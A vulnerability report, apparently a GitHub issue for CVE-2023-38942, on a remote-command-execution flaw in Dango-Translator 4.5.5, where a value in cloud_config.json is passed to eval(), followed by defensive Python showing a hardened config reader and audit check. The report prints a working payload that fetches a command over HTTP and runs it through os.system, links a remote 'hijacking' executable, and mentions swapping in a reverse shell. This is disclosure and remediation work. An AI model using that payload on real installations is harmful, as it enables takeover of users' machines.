CVE-2023-38942: [Warning] Hijacked Remote Command Execute in Dango-Translator Ver4.5.5 · Issue #127 · PantsuDango/Dango-Translator

Dango-Translator v4.5.5 was discovered to contain a remote command execution (RCE) vulnerability via the component app/config/cloud_config.json.


Vulnerability Product: Dango-Translator Ver4.5.5
Vulnerability version: Ver4.5.5
Vulnerability type: Hijacked Remote Command Execute
Vulnerability Details:
Vulnerability location: app/config/cloud_config.json

Without checking the xxxUse variable in app/config/cloud_config.json before eval'ing it, an unsafe config may cause Hijacked Remote Command Execute.

client payload : "import(‘urllib.request’).request.urlopen(‘http://localhost:12345/DangoTranslate/ShowDict’).read().decode(‘utf-8’) + (‘’ if import(‘os’).system(import(‘urllib.request’).request.urlopen(‘http://localhost:12345/CmdPath’).read().decode(‘utf-8’)) else ‘’)"
remote hijacking program : https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe
remote hijacking program original code : https://github.com/Leeyangee/leeya_bug/tree/main/DangoTranslator_payload/testProject

PROVE:

Firstly, download Dango-Translator Ver4.5.5.
Run the program to generate the config.

Secondly, go to app/config/cloud_config.json and replace the value of xxxUse with the client payload;
here replace "tencentwebUse": “False” with "tencentwebUse": "import(‘urllib.request’).request.urlopen(‘http://localhost:12345/DangoTranslate/ShowDict’).read().decode(‘utf-8’) + (‘’ if import(‘os’).system(import(‘urllib.request’).request.urlopen(‘http://localhost:12345/CmdPath’).read().decode(‘utf-8’)) else ‘’)"

Thirdly, download the remote hijacking program: https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe, and keep the program running.
(This is a remote hijacking program, so you can deploy it on a server, but you need to change IP_DOMAIN in the original code and the url in the client payload and re-compile it.)

Fourthly, run "团子翻译器.exe"; after logging in, Windows pops up a calculator (because the remote hijacking program runs the “calc” command on the client).

Once the client logs in, the remote hijacking program can detect it and run commands on the client.

This proves Hijacked Remote Command Execute.

REASON:

The client payload is divided into these parts:

The result of eval(client payload) is itself, because “tencentwebUse” will be evaluated before exit.

Harm:

Attackers could replace the payload in order to make the client send a shell back to them,
so attackers could directly obtain a shell and get server permissions.

discovered by leeya_bug
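The root cause described in this report is a configuration value being passed to eval() instead of being parsed as a boolean. The following is an added illustration, not code from the Dango-Translator project or from the reporter: it places the vulnerable read pattern beside a hardened reader that accepts only boolean values, plus a small audit function that flags any *Use key holding something other than a boolean. The config contents, the key name baiduwebUse and the function names are constructed for the example.

```python
import json

# Constructed sample in the shape the report describes (not the project's real file):
# every *Use key holds the string "True" or "False".
SAMPLE_CONFIG = '{"tencentwebUse": "False", "baiduwebUse": "True"}'

# Constructed tampered copy: the value is an expression, not a boolean literal.
TAMPERED_CONFIG = '{"tencentwebUse": "1 + 1", "baiduwebUse": "True"}'

# The only string spellings the hardened reader accepts.
_BOOL_STRINGS = {"True": True, "False": False, "true": True, "false": False}


def load_flag_unsafe(config_text: str, key: str):
    """The bug class from the report: the string taken from the config file is
    handed to eval(), so whatever expression is stored there executes with the
    application's privileges. Shown for contrast only."""
    return eval(json.loads(config_text)[key])


def load_flag_safe(config_text: str, key: str, default: bool = False) -> bool:
    """Hardened reader: the value must be a JSON boolean or one of four fixed
    strings. Nothing taken from the file is ever evaluated as code; anything
    else is rejected with an error instead of being run."""
    value = json.loads(config_text).get(key, default)
    if isinstance(value, bool):
        return value
    if isinstance(value, str) and value in _BOOL_STRINGS:
        return _BOOL_STRINGS[value]
    raise ValueError(f"config key {key!r} must be a boolean, got {value!r}")


def audit_use_flags(config_text: str) -> list:
    """Defender check: return every *Use key whose value is not a plain boolean.
    Suitable as a startup sanity check or for scanning a config file that may
    have been modified on disk."""
    bad = []
    for key, value in json.loads(config_text).items():
        if not key.endswith("Use"):
            continue
        if isinstance(value, bool) or (isinstance(value, str) and value in _BOOL_STRINGS):
            continue
        bad.append(key)
    return bad


if __name__ == "__main__":
    print("unsafe, clean file :", load_flag_unsafe(SAMPLE_CONFIG, "tencentwebUse"))
    print("unsafe, tampered   :", load_flag_unsafe(TAMPERED_CONFIG, "tencentwebUse"))
    print("safe, clean file   :", load_flag_safe(SAMPLE_CONFIG, "tencentwebUse"))
    try:
        load_flag_safe(TAMPERED_CONFIG, "tencentwebUse")
    except ValueError as exc:
        print("safe, tampered     : rejected ->", exc)
    print("audit of tampered  :", audit_use_flags(TAMPERED_CONFIG))
```

With the clean file both readers return False for tencentwebUse; with the tampered file the unsafe reader silently evaluates the expression and returns 2, while the hardened reader raises and the audit names the offending key. The wider lesson is that a config file in a user-writable directory is untrusted input, so the fix is a strict parser for the expected type, not a filter applied before eval().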
